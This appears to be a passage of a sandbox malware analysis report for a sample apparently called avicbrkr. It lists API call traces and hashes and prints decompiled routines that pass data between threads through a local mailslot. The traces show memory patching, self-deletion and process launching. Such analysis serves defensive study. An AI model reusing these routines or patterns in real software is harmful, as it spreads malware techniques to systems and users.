                        • Part of subcall function 0037D7EE: OpenProcess.KERNEL32(00000400,00000000,00000000,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037D944
                        • Part of subcall function 0037D7EE: GetLastError.KERNEL32(?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037D94E
                        • Part of subcall function 0037D7EE: CloseHandle.KERNEL32(00000000), ref: 0037D95C
                        • Part of subcall function 0037D7EE: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 0037D9E9
                        • Part of subcall function 0037D7EE: LoadLibraryA.KERNEL32(0039E000), ref: 0037DA84
                        • Part of subcall function 0037D7EE: RtlAllocateHeap.NTDLL(00000000,00000043), ref: 0037DAFD
                        • Part of subcall function 0037D7EE: wsprintfA.USER32 ref: 0037DB25
                      • GetLastError.KERNEL32(?,0039E605,00000001,0039D2DC,00000000), ref: 0037DDF3
                      • RtlRemoveVectoredExceptionHandler.NTDLL(0039D264), ref: 0037DE09
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CloseProcess$AllocateErrorHeapInformationLastOpenQueryToken$CreateExceptionHandleHandlerVectored$EventLibraryLoadMutexRemove_struprlstrlenmemcpymemsetwsprintf
                      • String ID:
                      • API String ID: 3267585064-0
                      • Opcode ID: a3fdb3ca14ae9819b4cafed1f3842ec6d543b40a4885a312f17c740e27209595
                      • Instruction ID: 31f2f900677d168d38ee992cc22f9364883db57e83dcd49850555a087b2990c6
                      • Opcode Fuzzy Hash: a3fdb3ca14ae9819b4cafed1f3842ec6d543b40a4885a312f17c740e27209595
                      • Instruction Fuzzy Hash: 0531D4729042119FDB336F74AC86A6E7BBCEF04310F06492BE995DB1A1D77ACC818790
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      APIs
                      • NtOpenProcess.NTDLL(?,00000400,?,0039D2DC), ref: 0038A073
                      • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 0038A086
                      • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?,00000000), ref: 0038A0A2
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?,?), ref: 0038A0BF
                      • memcpy.NTDLL(00000000,00000000,0000001C), ref: 0038A0CC
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      • NtClose.NTDLL(?), ref: 0038A0DE
                      • NtClose.NTDLL(?), ref: 0038A0E8
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Token$CloseHeapInformationOpenProcessQuery$AllocateFreememcpy
                      • String ID:
                      • API String ID: 2354801525-0
                      • Opcode ID: e9986be11a0d1d0bd03d2fd2896533865678ec21f189fe13ffab3d5abda333ea
                      • Instruction ID: b02e9cd9de7d67ebfcd8194ae6651c308d97f2ab63f347bdb95b489371704582
                      • Opcode Fuzzy Hash: e9986be11a0d1d0bd03d2fd2896533865678ec21f189fe13ffab3d5abda333ea
                      • Instruction Fuzzy Hash: 5C2116B2910218BBDF12AFA4CC459DEBFBDEF08740F108466F904EA160D7729A449BA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 003A31DF
                      • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 003A324A
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217114277.003A3000.00000040.sdmp, Offset: 003A3000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_3a3000_avicbrkr.jbxd
                      Similarity
                      • API ID: MemoryProtectVirtual
                      • String ID: z
                      • API String ID: 2706961497-1657960367
                      • Opcode ID: ddf782b6d27c912e9975ef9c215edfa69c5d14100a0496b08ad2c99292f13ca3
                      • Instruction ID: 129b7fc92b16285fff015f350fb3040d803ab117c1780267222f310baf292ed3
                      • Opcode Fuzzy Hash: ddf782b6d27c912e9975ef9c215edfa69c5d14100a0496b08ad2c99292f13ca3
                      • Instruction Fuzzy Hash: 5D819172900209DFCB16CF99C880AAEF7B9FF86304F25855EE556DB251E730EA45CB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,H}*), ref: 00388872
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: InformationProcessQuery
                      • String ID: H}*
                      • API String ID: 1778838933-3236088583
                      • Opcode ID: b1bb59feea27c5376510d45072141a0260718e18003b6b2f8b744951a913df83
                      • Instruction ID: cc46f189b979563babeb43e1d0d3f22d64747b411a6452500091669a9b01c797
                      • Opcode Fuzzy Hash: b1bb59feea27c5376510d45072141a0260718e18003b6b2f8b744951a913df83
                      • Instruction Fuzzy Hash: 5AF05E317102159BC721EF55CC85D9BBBACEB41750BD54595E900DB2A1D730ED06CBE1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      (rendered graph not available; nodes were marked Executed / Not Executed)
                      APIs
                        • Part of subcall function 006329A4: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00637614,006316B0,?,00637614), ref: 006329B3
                        • Part of subcall function 006329A4: GetVersion.KERNEL32(?,00637614), ref: 006329C2
                        • Part of subcall function 006329A4: GetCurrentProcessId.KERNEL32(?,00637614), ref: 006329D1
                        • Part of subcall function 006329A4: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00637614), ref: 006329EA
                      • WaitForSingleObject.KERNEL32(00000040), ref: 006316D2
                        • Part of subcall function 00633223: OpenProcess.KERNEL32(00000400,00000000,00637614,0063618C,0000000C,?,?,00631718,00000000,?,00637614), ref: 0063323E
                        • Part of subcall function 00633223: IsWow64Process.KERNEL32(00637624,?,0063618C,0000000C,?,?,00631718,00000000,?,00637614), ref: 0063324F
                        • Part of subcall function 00633223: CloseHandle.KERNEL32(00637624), ref: 00633262
                      • CloseHandle.KERNEL32(00000000), ref: 00631966
                        • Part of subcall function 006315FB: CreateFileW.KERNEL32(0063763C,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00631611
                        • Part of subcall function 006315FB: CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,00637614), ref: 00631627
                        • Part of subcall function 006315FB: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,00637614), ref: 0063163F
                        • Part of subcall function 006315FB: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,00637614), ref: 00631651
                        • Part of subcall function 006315FB: GetLastError.KERNEL32(?,00000000,?,00637614), ref: 0063165F
                        • Part of subcall function 006315FB: GetLastError.KERNEL32(?,00000000,?,00637614), ref: 0063166C
                        • Part of subcall function 006315FB: GetLastError.KERNEL32(?,00637614), ref: 0063167B
                        • Part of subcall function 0063144F: LoadLibraryA.KERNEL32(00638019), ref: 0063145E
                        • Part of subcall function 0063144F: GetModuleHandleA.KERNEL32(00638019,00638000,?,?,0063178B,00000000,?,00637614), ref: 00631484
                      • GetLastError.KERNEL32(00637678,00000000,?,00637614), ref: 0063197D
                        • Part of subcall function 00631189: HeapFree.KERNEL32(00000000,?,006381D0), ref: 0063121A
                      • lstrcatW.KERNEL32(006384B8,00637678), ref: 006317FD
                      • LocalFree.KERNEL32(?), ref: 00631970
                        • Part of subcall function 00631227: PathFindFileNameW.SHLWAPI(0063618C), ref: 00631249
                        • Part of subcall function 00631227: lstrcmpiW.KERNEL32(00000000,?,00637614), ref: 00631250
                        • Part of subcall function 00631227: RegOpenKeyExA.ADVAPI32(80000001,00638080,00000000,00000000,?,?,00637614), ref: 00631281
                        • Part of subcall function 00631227: lstrlenW.KERNEL32(?,00637614), ref: 00631295
                        • Part of subcall function 00631227: RtlAllocateHeap.NTDLL(00000000,?), ref: 006312AD
                        • Part of subcall function 00631227: RegQueryValueExW.ADVAPI32(?,00000000,00637614,00000000,00637614,?,00637614), ref: 006312CC
                        • Part of subcall function 00631227: StrStrIW.SHLWAPI(00000000), ref: 006312E9
                        • Part of subcall function 00631227: HeapFree.KERNEL32(00000000,00000000), ref: 006312FE
                        • Part of subcall function 00631227: RegCloseKey.ADVAPI32(?,?,00637614), ref: 00631307
                        • Part of subcall function 00633E06: OpenProcessToken.ADVAPI32(000000FF,00020008,00637614,00000000), ref: 00633E38
                        • Part of subcall function 00633E06: GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00633E93
                        • Part of subcall function 00633E06: GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00633EA3
                        • Part of subcall function 00633E06: CloseHandle.KERNEL32(00637614), ref: 00633EB8
                        • Part of subcall function 00632D8C: memset.NTDLL ref: 00632DAA
                        • Part of subcall function 00632D8C: CoInitializeEx.OLE32(00000000,00000002), ref: 00632DB5
                        • Part of subcall function 00632D8C: PathFindExtensionW.SHLWAPI(00000000), ref: 00632DD0
                        • Part of subcall function 00632D8C: lstrcpyW.KERNEL32(00000000,00638224), ref: 00632DE5
                        • Part of subcall function 00632D8C: lstrlen.KERNEL32(00637614,?,?,?,?,?,?,?,?,?,?,00631853,?), ref: 00632E02
                        • Part of subcall function 00632D8C: lstrcpyW.KERNEL32(00000000,006384B8), ref: 00632E33
                        • Part of subcall function 00632D8C: wsprintfW.USER32 ref: 00632E6A
                        • Part of subcall function 00632D8C: ShellExecuteExW.SHELL32(0000003C), ref: 00632E9F
                        • Part of subcall function 00632D8C: CoUninitialize.OLE32 ref: 00632EB3
                        • Part of subcall function 00632CDF: lstrlenW.KERNEL32(00000000,00000000,00637614,?,00001FD1,00000000,00000000,?,?,00631841,?,?), ref: 00632D1A
                        • Part of subcall function 00632CDF: PathFindFileNameW.SHLWAPI(00000000), ref: 00632D32
                        • Part of subcall function 00632CDF: lstrcatW.KERNEL32(00000000,?), ref: 00632D5B
                        • Part of subcall function 0063131A: memset.NTDLL ref: 00631323
                        • Part of subcall function 0063131A: HeapFree.KERNEL32(00000000,?,?), ref: 00631392
                      • CreateEventA.KERNEL32(?,00000001,00000000), ref: 00631898
                      • GetLastError.KERNEL32 ref: 006318A9
                      • SetEvent.KERNEL32(00000000), ref: 006318B4
                      • Sleep.KERNEL32(00000BB8), ref: 006318BF
                      • ResetEvent.KERNEL32(00000000), ref: 006318C6
                      • CloseHandle.KERNEL32(00000000), ref: 006318CD
                        • Part of subcall function 00634253: RegOpenKeyExA.ADVAPI32(80000003,00000000,00000000,?,00000001,00000000,000000B7,00000001,?,00000000,?,?,00637614), ref: 0063427A
                        • Part of subcall function 00634253: RegEnumKeyExA.ADVAPI32(00000000,?,00000000,00637614,00000000,00000000,00000000,00000000,00000104,00000000,?,00637614), ref: 006342C1
                        • Part of subcall function 00634253: WaitForSingleObject.KERNEL32(00000000,?), ref: 0063432E
                        • Part of subcall function 00634253: RegCloseKey.ADVAPI32(?,00000104,00000000,?,00637614), ref: 00634356
                      • DeleteFileW.KERNEL32(0063763C,?), ref: 00631906
                      • MoveFileExW.KERNEL32(00000000,00000004), ref: 00631919
                        • Part of subcall function 00633C1B: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 00633C4C
                        • Part of subcall function 00633C1B: RtlNtStatusToDosError.NTDLL(C000009A), ref: 00633C85
                      • CreateWaitableTimerA.KERNEL32(?,00000001,?), ref: 0063193C
                      • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0063195F
                        • Part of subcall function 00634365: lstrcpyn.KERNEL32(006316FE,006361F4,00000008,0063618C,0000000C,00000000,?,?,?,006316FE,?,?,00637614), ref: 00634393
                        • Part of subcall function 00634365: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,006316FE,?,?,00637614), ref: 00634406
                        • Part of subcall function 00634365: memcpy.NTDLL(?,00000000,?,?,00637614,00000001,?,?,?,006316FE,?,?,00637614), ref: 0063444F
                        • Part of subcall function 00634365: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00637614,00000001,?,?,?,006316FE,?), ref: 00634468
                      • ExitProcess.KERNEL32 ref: 0063198E
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$CloseErrorProcess$CreateFreeHandleLastOpen$EventHeap$FindPathlstrlen$AuthorityNameObjectQuerySingleTimerVirtualWaitWaitablelstrcatlstrcpymemset$AllocAllocateCountCurrentDeleteEnumExecuteExitExtensionInformationInitializeLibraryLoadLocalMappingModuleMoveResetShellSizeSleepStatusSystemTokenUninitializeValueVersionViewWow64lstrcmpilstrcpynmemcpywsprintf
                      • String ID:
                      • API String ID: 2996900253-0
                      • Opcode ID: 4a79d4b2d838a23f793b5b1292191984090d1f2ce89031a1e5c32b055d424281
                      • Instruction ID: d55ea1e530be0c58699f32852acf15459902918dac3998080f27c11317db8e77
                      • Opcode Fuzzy Hash: 4a79d4b2d838a23f793b5b1292191984090d1f2ce89031a1e5c32b055d424281
                      • Instruction Fuzzy Hash: 1381C2B2504315AFDB20AF74DD86AAAB7FBAB46314F04592DF641DB2A0DB30C844CBD5
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      C-Code - Quality: 100%
                      			// Decompiled orchestration routine (sandbox output; analyst comments added).
                      			// Starts two worker threads over the shared context _v28 and runs a final
                      			// stage only if both threads exit with status 0.
                      			E00401649(intOrPtr __eax, long _a4) {
                      				void* _v8;
                      				long _v12;
                      				void* _v16;
                      				void _v28;
                      				void* __ebx;
                      				void* _t29;
                      				void* _t34;
                      				long _t45;
                      				void* _t47;
                      
                      				 *0x40305c = __eax;
                      				_v28 = _a4;
                      				 *0x403268 = 0x736c6e70; // executed
                      				// First worker thread (E00401034), handle kept in _v8
                      				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
                      				_v8 = _t29;
                      				if(_t29 == 0) {
                      					_a4 = GetLastError();
                      				} else {
                      					// Second worker thread (E004010FB, the mailslot writer), handle kept in _v16
                      					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
                      					_t47 = _t34;
                      					_v16 = _t47;
                      					if(_t47 == 0) {
                      						_a4 = GetLastError();
                      					} else {
                      						_a4 = 0;
                      						// Wait for the writer thread; a non-zero exit code aborts the first thread
                      						WaitForSingleObject(_t47, 0xffffffff); // executed
                      						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
                      							TerminateThread(_v8, _a4);
                      						} else {
                      							// Writer succeeded: wait for the first thread and, if it also
                      							// returned 0, run the final stage E004015A3 (uses VirtualAlloc)
                      							WaitForSingleObject(_v8, 0xffffffff);
                      							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
                      								_t45 = E004015A3( &_v28); // executed
                      								_a4 = _t45;
                      							}
                      						}
                      						CloseHandle(_v16);
                      					}
                      					CloseHandle(_v8);
                      				}
                      				// _a4 carries the status of the last failing step (or 0 on success)
                      				return _a4;
                      			}

                      APIs
                      • CreateThread.KERNELBASE(00000000,00000000,00401034,?,00000000,?), ref: 0040167E
                      • CreateThread.KERNELBASE(00000000,00000000,004010FB,?,00000000,?), ref: 0040169C
                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016B3
                      • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016C0
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016D0
                      • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016D9
                        • Part of subcall function 004015A3: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,752AC470,004016EC,?,?,00000000), ref: 004015C9
                      • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016F7
                      • CloseHandle.KERNEL32(?), ref: 00401700
                      • GetLastError.KERNEL32(?,?,00000000), ref: 00401708
                      • CloseHandle.KERNEL32(?), ref: 00401714
                      • GetLastError.KERNEL32(?,00000000), ref: 0040171D
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217158245.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000010.00000002.1217145146.00400000.00000002.sdmp
                      • Associated: 00000010.00000002.1217167536.00402000.00000002.sdmp
                      • Associated: 00000010.00000002.1217176686.00403000.00000004.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_400000_avicbrkr.jbxd
                      Similarity
                      • API ID: Thread$CloseCodeCreateErrorExitHandleLastObjectSingleWait$AllocTerminateVirtual
                      • String ID:
                      • API String ID: 2781294418-0
                      • Opcode ID: 8c03ab36042ed6f52e850f07250f175f27c204e4b6659917796c1b471e7c79f0
                      • Instruction ID: 87f03f665843337bf68fe172ccf2670ca8cb997910dba5155611d0e3495f720c
                      • Opcode Fuzzy Hash: 8c03ab36042ed6f52e850f07250f175f27c204e4b6659917796c1b471e7c79f0
                      • Instruction Fuzzy Hash: 2E31FC71800209FBDB11DFA5DD858EE7BBCEB49350B208137FA05F61A0D6749A44DBA8
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      (rendered graph not available; nodes were marked Executed / Not Executed)
                      C-Code - Quality: 94%
                      			// Decompiled mailslot-writer thread (sandbox output; analyst comments added).
                      			// Delivers the buffer produced by E0040172F to the local mailslot
                      			// "\\.\mailslot\msl0" in chunks of at most 0x1000 bytes, then wipes and frees it.
                      			E004010FB(void* __ebx, void* __edi, void* _a4) {
                      				struct _SECURITY_ATTRIBUTES* _v8;
                      				long _v12;
                      				long _v16;
                      				void* _v20;
                      				void* _v24;
                      				void* _t28;
                      				void* _t34;
                      				int _t39;
                      				long _t40;
                      				long _t43;
                      				void* _t45;
                      				long _t46;
                      				void* _t48;
                      				void* _t52;
                      
                      				_t48 = __edi;
                      				_t45 = __ebx;
                      				_v8 = 0;
                      				// Open the mailslot for writing (GENERIC_WRITE, OPEN_EXISTING); retry every
                      				// 100 ms while it does not exist yet (error 2, ERROR_FILE_NOT_FOUND), i.e.
                      				// wait for the reader side to create it
                      				do {
                      					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
                      					_v20 = _t28;
                      					if(_t28 != 0xffffffff) {
                      						_v12 = 0;
                      					} else {
                      						_v12 = GetLastError();
                      						Sleep(0x64);
                      					}
                      				} while (_v12 == 2);
                      				if(_v12 != 0) {
                      					L19:
                      					return _v12;
                      				}
                      				// Build the message: on return _a4 appears to point at the buffer and
                      				// _v24 to hold its length; failure is reported as 0xb (ERROR_BAD_FORMAT)
                      				_t34 = E0040172F( *_a4,  &_a4,  &_v24); // executed
                      				if(_t34 == 0) {
                      					_v12 = 0xb;
                      					L18:
                      					CloseHandle(_v20);
                      					goto L19;
                      				}
                      				_t52 = _a4;
                      				_push(_t45);
                      				_t46 = _v24;
                      				_push(_t48);
                      				// Send loop: _v8 is the offset written so far, _t46 the bytes remaining
                      				do {
                      					_v16 = _t46;
                      					if(_t46 >= 0x1000) {
                      						_v16 = 0x1000;
                      					}
                      					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
                      					if(_t39 == 0) {
                      						_t40 = GetLastError();
                      						_v12 = _t40;
                      						// Only ERROR_SEM_TIMEOUT (0x79) is retried; any other error ends the transfer
                      						if(_t40 != 0x79) {
                      							break;
                      						}
                      					} else {
                      						_t43 = _v16;
                      						_v8 = _v8 + _t43;
                      						_t46 = _t46 - _t43;
                      						// If the data ended on a full 0x1000-byte chunk, re-send its last byte as a
                      						// separate short message so the final write is never a full-sized chunk
                      						if(_t46 == 0 && _t43 == 0x1000) {
                      							_t46 = _t46 + 1;
                      							_v8 = _v8 - 1;
                      						}
                      					}
                      					Sleep(0x64); // executed
                      				} while (_t46 != 0);
                      				// Zero the sent data and release the buffer (E00401207 wraps HeapFree)
                      				memset(_t52, 0, _v8);
                      				E00401207(_t52);
                      				goto L18;
                      			}

                      APIs
                      • CreateFileA.KERNELBASE(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
                      • GetLastError.KERNEL32 ref: 00401126
                      • Sleep.KERNEL32(00000064), ref: 00401131
                        • Part of subcall function 0040172F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401818
                      • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 0040118A
                      • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
                      • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
                      • memset.NTDLL ref: 004011C8
                        • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401599,00401599), ref: 00401213
                      • CloseHandle.KERNEL32(?), ref: 004011E4
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217158245.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000010.00000002.1217145146.00400000.00000002.sdmp
                      • Associated: 00000010.00000002.1217167536.00402000.00000002.sdmp
                      • Associated: 00000010.00000002.1217176686.00403000.00000004.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_400000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorFileLastSleep$CloseCreateFreeHandleHeapWritememcpymemset
                      • String ID: \\.\mailslot\msl0
                      • API String ID: 990326202-622273203
                      • Opcode ID: 4bdae630b9fcbe0f8a23b9428ee12f3568433213e803cd86aea26540267a1728
                      • Instruction ID: 3a6e4c3a0fa27cd688e5fef70a244e9f952e20069a63f9e9082676df5e7f771b
                      • Opcode Fuzzy Hash: 4bdae630b9fcbe0f8a23b9428ee12f3568433213e803cd86aea26540267a1728
                      • Instruction Fuzzy Hash: 47314D75E00218ABDB15DFA5DD88A9EBBB8AF08354F104077F601BA2E0D7749A40CB59
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 128 387c56-387c84 call 395c00 call 38a2fc 133 387c8a-387ca0 VirtualProtect 128->133 134 387dbf-387dc6 128->134 136 387ca6-387cd3 call 387b93 133->136 137 387db7-387ddc GetLastError 133->137 135 387ddf-387deb call 395c3b 134->135 136->135 143 387cd9-387ce0 136->143 137->135 144 387d3b-387d60 VirtualProtect 143->144 145 387ce2-387ce9 143->145 147 387d6b-387da8 RtlEnterCriticalSection RtlLeaveCriticalSection call 38885b 144->147 148 387d62-387d66 call 38783a 144->148 145->144 146 387ceb-387cfa call 387b3c 145->146 146->144 155 387cfc-387d09 VirtualProtect 146->155 152 387dad-387daf 147->152 148->147 152->135 154 387db1-387db5 152->154 154->135 155->144 156 387d0b-387d26 155->156 157 387d28 156->157 158 387d2f-387d39 VirtualProtect 156->158 157->158 158->144
                      APIs
                        • Part of subcall function 0038A2FC: lstrcmp.KERNEL32(?,00000000), ref: 0038A3B4
                        • Part of subcall function 0038A2FC: lstrlen.KERNEL32(?,00000000,00000000,?), ref: 0038A3BF
                      • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,0038819A,00399540,0000001C,00387E1E,00000002,00000000,00000001,00000000,?,00000000), ref: 00387C9C
                      • GetLastError.KERNEL32(?,0038819A,00000000,?,?,?,0037B5E2,00000000,00000000,00000000,0037D9D1,?,0000005C,?,0037DDEC,?), ref: 00387DB7
                        • Part of subcall function 00387B93: lstrlen.KERNEL32(?,?,?,?,0037B5E2), ref: 00387BCB
                        • Part of subcall function 00387B93: lstrcpy.KERNEL32(00000000,?), ref: 00387BE2
                        • Part of subcall function 00387B93: StrChrA.SHLWAPI(00000000,0000002E), ref: 00387BEB
                        • Part of subcall function 00387B93: GetModuleHandleA.KERNEL32(00000000,?,0037B5E2), ref: 00387C09
                      • VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,0037B5E2,?,0038819A,00000000,?,?,?,0037B5E2,00000000), ref: 00387D05
                      • VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,0038819A,00000000,?,?), ref: 00387D39
                      • VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,0037B5E2,?,0038819A,00000000,?,?,?,0037B5E2,00000000,00000000,00000000), ref: 00387D50
                      • RtlEnterCriticalSection.NTDLL(H}*), ref: 00387D71
                      • RtlLeaveCriticalSection.NTDLL(H}*), ref: 00387D8F
                        • Part of subcall function 0038885B: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,H}*), ref: 00388872
                        • Part of subcall function 0038783A: lstrlen.KERNEL32(00000000,0037B5E2,?,?,?,00387AAD,00000000,?,0037B5E2), ref: 0038786C
                        • Part of subcall function 0038783A: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,0037B5E2,?,?,?,00387AAD,00000000,?,0037B5E2), ref: 00387886
                        • Part of subcall function 0038783A: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,00387AAD,00000000,?,0037B5E2), ref: 003878B9
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ProtectVirtual$lstrlen$CriticalSection$EnterErrorHandleInformationLastLeaveModuleProcessQuerylstrcmplstrcpy
                      • String ID: H}*
                      • API String ID: 2045153472-3236088583
                      • Opcode ID: 5c006053013e9fcb676a8417a4361ed054e67cc1bd191c29f42f2a90d01e2520
                      • Instruction ID: 2659f97271664cbc2102d09913fd3152a9dba1b91fcffa22764e4894453ebb70
                      • Opcode Fuzzy Hash: 5c006053013e9fcb676a8417a4361ed054e67cc1bd191c29f42f2a90d01e2520
                      • Instruction Fuzzy Hash: 48515B71900709EFCB12EF69C885AA9BBB9FF08310F15815AF914AB290D770ED50CFA4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 159 401034-40105a CreateMailslotA 160 4010d6-4010df GetLastError 159->160 161 40105c-401066 call 4011f2 159->161 162 4010e2-4010e6 160->162 167 4010c4 161->167 168 401068-40107e ReadFile 161->168 164 4010f1-4010f8 162->164 165 4010e8-4010ee 162->165 165->164 169 4010cb-4010d4 CloseHandle 167->169 170 401080-40109c RtlReAllocateHeap 168->170 171 4010a4-4010b0 GetLastError 168->171 169->162 170->167 173 40109e-4010a2 170->173 171->169 172 4010b2 171->172 174 4010b5-4010c0 Sleep 172->174 173->174 174->168 175 4010c2 174->175 175->169
                      C-Code - Quality: 100%
                      			E00401034(void* _a4) {
                      				signed int _v8;
                      				long _v12;
                      				long _v16;
                      				void* _v20;
                      				void* _t24;
                      				long _t25;
                      				void* _t27;
                      				int _t32;
                      				long _t33;
                      				void* _t34;
                      				void* _t35;
                      				long _t36;
                      
                      				_t36 = 0;
                      				_v12 = 0x1000;
                      				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
                      				_v20 = _t24;
                      				if(_t24 == 0) {
                      					_t25 = GetLastError();
                      					_t35 = _a4;
                      					_v8 = _t25;
                      				} else {
                      					_t35 = E004011F2(0x1000);
                      					if(_t35 == 0) {
                      						L9:
                      						_v8 = 8;
                      					} else {
                      						do {
                      							_t32 = ReadFile(_v20, _t35 + _t36, 0x1000,  &_v16, 0); // executed
                      							if(_t32 == 0) {
                      								_t33 = GetLastError();
                      								_v8 = _t33;
                      								if(_t33 == 0x79) {
                      									_v16 = 0x1000;
                      									goto L7;
                      								}
                      							} else {
                      								_v12 = _v12 + 0x1000;
                      								_t36 = _t36 + _v16;
                      								_t34 = RtlReAllocateHeap( *0x40305c, 0, _t35, _v12); // executed
                      								_t35 = _t34;
                      								if(_t35 == 0) {
                      									goto L9;
                      								} else {
                      									_v8 = _v8 & 0x00000000;
                      									goto L7;
                      								}
                      							}
                      							goto L10;
                      							L7:
                      							Sleep(0x64); // executed
                      						} while (_v16 == 0x1000);
                      					}
                      					L10:
                      					CloseHandle(_v20);
                      				}
                      				if(_v8 == 0) {
                      					_t27 = _a4;
                      					 *(_t27 + 4) = _t35;
                      					 *((intOrPtr*)(_t27 + 8)) = _t36;
                      				}
                      				return _v8;
                      			}
                      0x0040103d
                      0x0040104c
                      0x0040104f
                      0x00401055
                      0x0040105a
                      0x004010d6
                      0x004010dc
                      0x004010df
                      0x0040105c
                      0x00401062
                      0x00401066
                      0x004010c4
                      0x004010c4
                      0x00401068
                      0x00401068
                      0x00401076
                      0x0040107e
                      0x004010a4
                      0x004010aa
                      0x004010b0
                      0x004010b2
                      0x00000000
                      0x004010b2
                      0x00401080
                      0x00401080
                      0x00401086
                      0x00401092
                      0x00401098
                      0x0040109c
                      0x00000000
                      0x0040109e
                      0x0040109e
                      0x00000000
                      0x0040109e
                      0x0040109c
                      0x00000000
                      0x004010b5
                      0x004010b7
                      0x004010bd
                      0x004010c2
                      0x004010cb
                      0x004010ce
                      0x004010ce
                      0x004010e6
                      0x004010e8
                      0x004010eb
                      0x004010ee
                      0x004010ee
